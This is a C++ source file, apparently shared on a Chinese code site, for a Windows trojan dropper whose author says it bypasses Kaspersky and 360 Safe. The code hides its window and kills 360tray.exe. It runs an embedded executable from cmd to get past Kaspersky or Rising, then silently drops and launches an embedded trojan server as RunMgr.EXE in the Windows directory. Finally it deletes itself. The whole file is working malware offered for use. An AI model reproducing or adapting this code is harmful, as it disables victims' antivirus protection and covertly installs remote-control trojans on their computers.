avp.cpp

一款由C++编写的加壳程序

// // // // // // // // // // // // // // // // // // // // //
//         Pass卡吧主动防御,360监控工具(Server)             //
//                                                          //
//   感谢之前帮助过我的朋友..........                       //
//                                                          //
// 联系方式：                       当前版本：Beta1.0       //
// QQ:4159175                       作者：小鱼(Xfish)       //
// 邮箱：ciwoyibai@vip.163.com      完成日期：2007年12月31日//
// // // // // // // // // // // // // // // // // // // // // 

#pragma   comment(   linker,   "/subsystem:\"windows\"   /entry:\"mainCRTStartup\""   ) //隐藏界面
#pragma comment(linker,"/ENTRY:main /FILEALIGN:0x600 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078") //缩小体积
#include <windows.h>
#include <stdio.h>
#include "resource.h"

//---------------------------------------------------------------------------------------------
void Passavp()//  K卡吧的主动防御......
{
  HRSRC HRavp;
  HGLOBAL HRMem;
  DWORD HRSize,WriteSize;
  LPVOID HRMlock;
  HANDLE Hfile;
  HRavp=FindResource(NULL, MAKEINTRESOURCE(IDR_EXE1), "EXE");
  if (HRavp != NULL)HRMem=LoadResource(NULL, HRavp);
  HRSize=SizeofResource(NULL, HRavp);
  HRMlock=LockResource(HRMem);
  if (HRMlock != NULL)
  {
	  char path[256];
	  char cmd[]="cmd.exe /c ";
	  GetWindowsDirectory(path, 256);
	  strcat(path, "\\DEBUG.EXE");
	  Hfile = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	  WriteFile(Hfile, HRMlock, HRSize, &WriteSize, NULL);
	  CloseHandle(Hfile);
	  strcat(cmd,path);
	  WinExec(cmd,SW_HIDE);//运行AVP程序,这个最恶心..其他的运行方式卡吧均提示，最后我想到从DOS运行
	  Sleep(18000);
	  char Buffer[MAX_PATH];
	  GetEnvironmentVariable("COMSPEC", Buffer, MAX_PATH);
	  ShellExecute(NULL, "open", Buffer, "/c taskkill /im DEBUG.EXE /F", NULL, SW_HIDE);//结束进程
	  Sleep(80);
  }
 
  return;
}

//----------------------------------------------------------------------------------------------

void Pass360() // K 360安全卫士
{
 char Buffer[MAX_PATH];
 HKEY Reg360;
 if (RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\360Safe", &Reg360)==0)
 {
     GetEnvironmentVariable("COMSPEC", Buffer, MAX_PATH);//获得CMD窗口的全路径
     ShellExecute(NULL, "open", Buffer, "/c taskkill /im 360tray.exe", NULL, SW_HIDE);
 }
	return;
}

//-----------------------------------------------------------------------------------------------

void PassServer()  //  运行木马的服务端
{
  HRSRC HRServer;
  HGLOBAL HRMServer;
  DWORD   HSersize,WriteSersize;
  LPVOID  HRpoint;
  HANDLE  Serfile;
  HRServer=FindResource(NULL,MAKEINTRESOURCE(IDR_EXE2),"EXE");
   if (HRServer != NULL)HRMServer=LoadResource(NULL,HRServer);
   HSersize=SizeofResource(NULL,HRServer);
   HRpoint=LockResource(HRMServer);
   if (HRpoint != NULL)
   {
	  char Wpath[256];
	  GetWindowsDirectory(Wpath,256);
      strcat(Wpath, "\\RunMgr.EXE");
	  Serfile=CreateFile(Wpath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
      WriteFile(Serfile, HRpoint, HSersize, &WriteSersize, NULL);
	  CloseHandle(Serfile);
	  ShellExecute(NULL, "open", Wpath, NULL, NULL, SW_HIDE);
   }
   
   return ;
}

//-------------------------------------------------------------------------------------------

BOOL Run1()
{
   HKEY RegAvp;
   HKEY RegRising;
   if ((RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\KasperskyLab",&RegAvp)==0)
	  ||(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Rising", &RegRising)==0))
 
   {
    
		Passavp();
        Sleep(60);
        PassServer();
   }
   else
   {
   
		PassServer();
   }
 
  return true;
}
  

//--------------------------------------------------------------------------------------------


void DelMe() 
{
char DELPATH[MAX_PATH];
GetWindowsDirectory(DELPATH,MAX_PATH);
strcat(DELPATH, "\\Debug.exe");
char *DElCMD="cmd.exe /c del ";
strcat(DElCMD, DELPATH);
WinExec(DElCMD, SW_HIDE);
SHELLEXECUTEINFO sei;//声明一个类型结构
char szModule [MAX_PATH],szComspec[MAX_PATH],szParams [MAX_PATH];
GetModuleFileName(0, szModule, MAX_PATH);
GetShortPathName(szModule, szModule, MAX_PATH);
GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH);
// 设置命令参数.
strcpy(szParams,"/c del ");
strcat(szParams, szModule);
strcat(szParams, " > nul");
// 设置结构成员.
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0;
sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
 if(ShellExecuteEx(&sei))
 {
   // 设置命令行进程的执行级别为空闲执行，以等待最后执行来删除自身....
  SetPriorityClass(sei.hProcess,IDLE_PRIORITY_CLASS);
  SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
  SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);
 }
return ;



}
//------------------------------------------------------------------------------------
int main()
{
 
	Pass360();
    Run1();
    DelMe();
	return 0;
}


//程序很简单,此程序是偶用vc编写的第一个程序,所以程序代码等方面难免很乱，请多多包涵！